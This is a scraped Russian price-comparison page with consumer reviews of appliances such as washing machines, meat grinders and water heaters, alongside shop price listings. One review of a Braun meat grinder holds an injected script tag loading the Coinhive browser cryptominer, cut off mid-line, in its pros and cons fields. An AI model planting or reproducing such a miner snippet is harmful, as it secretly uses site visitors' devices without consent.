Omar.ru  — лучшие цены в интернете  
Например: Кондиционеры, Телевизоры
Москва
Москва

Выбор региона

Если вы хотите посмотреть предложения магазинов из других регионов воспользуйтесь формой ниже.
Введите регион:
- -
Omar.ruГлавная » Отзывы » Бытовая техника

Отзывы. Бытовая техника

Производители
Игорь, 08 июня 2018 г.

Отзыв о утюге Domotec MS 4925

оценка

3
Модель: Domotec MS 4925
Срок использования: менее года
Количество поломок: была 2 поломки
ДОСТОИНСТВА
 
НЕДОСТАТКИ
нет схемы электронного блока
МОЁ МНЕНИЕ: не надёжный
МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
Блок питания Krauler basic ..
Цена: 4 950 руб.
RBT.ru Сургут
Блок питания Krauler basic ..
Цена: 6 130 руб.
RBT.ru Красноярск
Блок питания Krauler basic ..
Цена: 6 130 руб.
RBT.ru Кемерово
Блок питания Powercom wow-700u
Цена: 4 120 руб.
RBT.ru Новосибирск
Блок питания Powercom wow-700u
Цена: 4 120 руб.
RBT.ru Уфа
Блок питания Powercom wow-700u
Цена: 4 120 руб.
RBT.ru Курган
Антонина, 30 мая 2018 г.

Отзыв о мясорубке Moulinex HV3 (А15)

оценка

10
Модель: Moulinex HV3 (А15)
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
При этой мощности- очень хороший агрегат.
 
НЕДОСТАТКИ
Я её так люблю, что минусов не вижу.
МОЁ МНЕНИЕ: Мясорубка HV3 (Франция) у нас с 1996года. Один раз поменяла нож, но зря, т.к. из дорогого и дешёвого ножей купила дешевый, который никакой, можно было и старый оставить. Пользуюсь мясорубкой постоянно: и мясо смолоть(филе курицы и рыбу на ура, а после мяса Подробнее
МОЙ СОВЕТ: Я рекомендую эту модель.
Алексей., 28 мая 2018 г.

Отзыв о водонагревателе Isea S 30-150

оценка

10
Модель: Isea S 30-150
Срок использования: больше 5 лет
Количество поломок: была 1 поломка
ДОСТОИНСТВА
Компактный. Не шумит. Прост в управлении. Минимум электроники. Анода хватило на 5 лет.
 
НЕДОСТАТКИ
Не нашёл пластиковых патрубков. Когда откручивал на холодной воде, сломал. Пришлось заменить на медный.
МОЁ МНЕНИЕ: Покупал isea ys 60 re в 2011. Использовали только в летнее время, с 20 мая по 20 сентября (обычно). Осенью 2017 начал срабатывать УЗО. Разобрал, от анода ничего не осталось. Заменил. ТЭН почистил, сутки отмокал в ведре с водой и лимонной кислотой. Бак промыл. Подробнее
МОЙ СОВЕТ: Я рекомендую эту модель.
Александр, 28 мая 2018 г.

Отзыв о фильтре для очистки воды Изумруд

оценка

1
Модель: Изумруд
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
всего 700р за чистку. В год!!!!
 
НЕДОСТАТКИ
Душа не верит в прибор. Разум тоже!
МОЁ МНЕНИЕ: Ребята! Вы еще верите в сказки. Если верите-бегом в магазин. Чудес не бывает.Особенно в сфере торговли.Камни во внутренних органах на месте. Гипертония и кишечные колики процветают. Грязь на дне стакана имеет место быть. Если вы сьедаете камешки и песочек Подробнее
МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
НГОСЯ, 15 мая 2018 г.

Отзыв о воздухоочистителе Аэролайф

оценка

9
Модель: Аэролайф
Срок использования: менее года
Количество поломок: поломок не было
ДОСТОИНСТВА
При почти непрерывной работе в течении 3-х месяцев отмечено,что дети стали болеть гораздо меньше.Но пыль как была так и Подробнее
 
НЕДОСТАТКИ
Гудит ночью даже в ночном режиме и сильно холодит зимой
МОЁ МНЕНИЕ: С-80
МОЙ СОВЕТ: Я рекомендую эту модель.
Сергей, 02 мая 2018 г.

Отзыв о водонагревателе Успех 200л

оценка

8
Модель: Успех 200л
Срок использования: больше 5 лет
Количество поломок: была 2 поломки
ДОСТОИНСТВА
Очень удобен
 
НЕДОСТАТКИ
Плохой доступ для замены тена и после 10 лет начинает течь по швам
МОЁ МНЕНИЕ: Хочу заменить на новый меня устраивает
МОЙ СОВЕТ: Я рекомендую эту модель.
Елена, 06 апреля 2018 г.

Отзыв о стиральной машине Korting KWA 50085 R

оценка

10
Модель: Korting KWA 50085 R
Срок использования: менее года
Количество поломок: поломок не было
ДОСТОИНСТВА
Одни плюсы
 
НЕДОСТАТКИ
нет
МОЁ МНЕНИЕ: Долго решалась на столь недешевую стиральную машинку, но с учетом того, что она стирает да еще и сушит белье, то вопрос отпал сам собой. Загрузка позволяет стирать объемные вещи, такие как пледы. одеяла, подушки и много другое. Я ее вообще не жалею, стираю Подробнее
МОЙ СОВЕТ: Я рекомендую эту модель.
Дмитрий, 03 апреля 2018 г.

Отзыв о микроволновой печи Polar W707M-17

оценка

10
Модель: Polar W707M-17
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: Отличная сборка. Ничего не ломалось, работает до сих пор. Со своей задачей (разогрев и разморозка) справляется без проблем. Решил написать отзыв так как продал ее на вторичном рынке. Обычная безпроблемная микроволновка. Сказать даже нечего...)))
МОЙ СОВЕТ: Я рекомендую эту модель.
Вера, 27 марта 2018 г.

Отзыв о стиральной машине Zanussi FLS 872 C

оценка

10
Модель: Zanussi FLS 872 C
Срок использования: больше 5 лет
Количество поломок: была 1 поломка
ДОСТОИНСТВА
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: В эксплуатации 17 лет,8 лет назад замена двигателя,до сих пор работает.
МОЙ СОВЕТ: Я рекомендую эту модель.
Евгений, 25 марта 2018 г.

Отзыв о стиральной машине Zanussi WD 1601

оценка

10
Модель: Zanussi WD 1601
Срок использования: больше 5 лет
Количество поломок: было 4 поломки
ДОСТОИНСТВА
Шикарная машина за умеренные деньги
 
НЕДОСТАТКИ
Отсутствуют индикаторы текущих этапов выполнения программы, отсутствует индикатор включения нагрева воды. Снята с Подробнее
МОЁ МНЕНИЕ: По-настоящему "умная" машина, вплоть до того, что можно доложить забытую вещь в процессе стирки и если воды не много, дверцу можно будет открыть сразу же. Стирает идеально direct spray - супер! Дизайн очень оригинальный- не надо сгибаться в три Подробнее
МОЙ СОВЕТ: Я рекомендую эту модель.
Дина, 05 марта 2018 г.

Отзыв о швейной машинке Jaguar 6434

оценка

10
Модель: Jaguar 6434
Срок использования: менее года
Количество поломок: поломок не было
ДОСТОИНСТВА
нить не рвет, строчки ровные
 
НЕДОСТАТКИ
нет
МОЁ МНЕНИЕ: После старой бабушкиной швейной машинки моя новая Jaguar конечно просто космос. Меня сразу продавец предупредил, что лучше на ней плотные ткани не шить, а мне сразу надо было новые джинсы подшить мужу. Рискнула-прошила, всё отлично. Ни разу машинка не Подробнее
МОЙ СОВЕТ: Я рекомендую эту модель.
Виктор, 03 марта 2018 г.

Отзыв о стиральной машине Ardo TL 800 EX

оценка

10
Модель: Ardo TL 800 EX
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
Компактность, нет лишних примочек, проста в эксплуатации.
 
НЕДОСТАТКИ
За 9 лет эксплуатации, пока, нет.
МОЁ МНЕНИЕ: Машинку эксплуатируем 9лет. Никаких проблем не возникало. Трудяга. Необходимо только не забывать элементарные рекомендации по уходу.
МОЙ СОВЕТ: Я рекомендую эту модель.
UPFOX, 22 февраля 2018 г.

Отзыв о мясорубке Braun G 1300 K

оценка

9
Модель: Braun G 1300 K
Срок использования: больше года
Количество поломок: поломок не было
ДОСТОИНСТВА
<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new Подробнее
 
НЕДОСТАТКИ
<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new Подробнее
МОЁ МНЕНИЕ: sdg h
МОЙ СОВЕТ: Я рекомендую эту модель.
Галина Леонидовна, 09 февраля 2018 г.

Отзыв о мясорубке Braun G 1300 K

оценка

9
Модель: Braun G 1300 K
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
Скорость хорошая, мощная, как на промышленной.
 
НЕДОСТАТКИ
Шумит, конечно, здорово, закрываю дверь в кухне.
МОЁ МНЕНИЕ: Пользуюсь с 2008 года. Немного изменился звук при работе.
МОЙ СОВЕТ: Я рекомендую эту модель.
Галина, 04 февраля 2018 г.

Отзыв о пылесосе BORK V601

оценка

3
Модель: BORK V601
Срок использования: менее года
Количество поломок: поломок не было
ДОСТОИНСТВА
Выполняет все функции, которые должен Не более!
 
НЕДОСТАТКИ
Непонятно из чего сложена такая цена
МОЁ МНЕНИЕ: Пылесосом пользуюсь полтора месяца. Полное разочарование жаль потраченных денег. Можно было купить модель гораздо дешевле, разницы бы не заметила. Обычный пылесос, просто, распиаренный. Вот и я повелась на отзывы. Неспорую, пылесос хорош, но денег таких СОВСЕМ Подробнее
МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
Алла, 20 января 2018 г.

Отзыв о стиральной машине Whirlpool AWE 7515

оценка

5
Модель: Whirlpool AWE 7515
Срок использования: больше 5 лет
Количество поломок: была 1 поломка
ДОСТОИНСТВА
Удобная в эксплуатации в небольшой ванной.
 
НЕДОСТАТКИ
При открытой крышке после стирки вода стекает и попадает в щель между открытой крышкой и панелью управления, от этого Подробнее
МОЁ МНЕНИЕ: Удобная,но недостаток из за непродуманности защиты верхней крышки от ржавчины.
МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
Ирина, 15 января 2018 г.

Отзыв о стиральной машине Candy Activa Smart 1040

оценка

10
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
ПОКУПАЙТЕ,НЕ ПОЖАЛЕЕТЕ
 
НЕДОСТАТКИ
НИ ОДНОГО НЕ НАШЛА ЗА 10 лет,(хотя я еще та противоза)!
МОЁ МНЕНИЕ: у меня тоже канди вертикалка в 2007 году покупала.За все эти 10 лет стирала как нодо,чисто,вот только не все порошки могла принимать.Только качественными порошками типа лоск,ариэль,персил, для носков миф. Пробовала раз тайд и еще какой то на б бедняжка так Подробнее
МОЙ СОВЕТ: Я рекомендую эту модель.
Геннадий, 12 января 2018 г.

Отзыв о стиральной машине Hotpoint-Ariston TX 100 EX

оценка

10
Срок использования: больше 5 лет
Количество поломок: была 1 поломка
ДОСТОИНСТВА
Все 10 баллов
 
НЕДОСТАТКИ
нет
МОЁ МНЕНИЕ: Работяга с большой буквы.Работает более 15 лет.Одна поломка была, перестал работать слив.В данный момент хочу провести диагностику,если будет еще служить и далее то она останется хозяйкой в нашей кв.и далее.
МОЙ СОВЕТ: Я рекомендую эту модель.
Наталья, 07 января 2018 г.

Отзыв о швейной машинке Necchi 559

оценка

10
Модель: Necchi 559
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: Шью на ней 18 лет шила все поломок небыло машинкой очень довольна
МОЙ СОВЕТ: Я рекомендую эту модель.
Наталья, 07 января 2018 г.

Отзыв о швейной машинке Necchi 559

оценка

10
Модель: Necchi 559
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: Шью на ней 18 лет шила все поломок небыло машинкой очень довольна
МОЙ СОВЕТ: Я рекомендую эту модель.

Предложения магазинов:

Блендер профессиональный ..
Цена: 24 900 руб. Купить в ГлобоТех
BEABA Блендер-пароварка ..
Philips HR1607/00 ..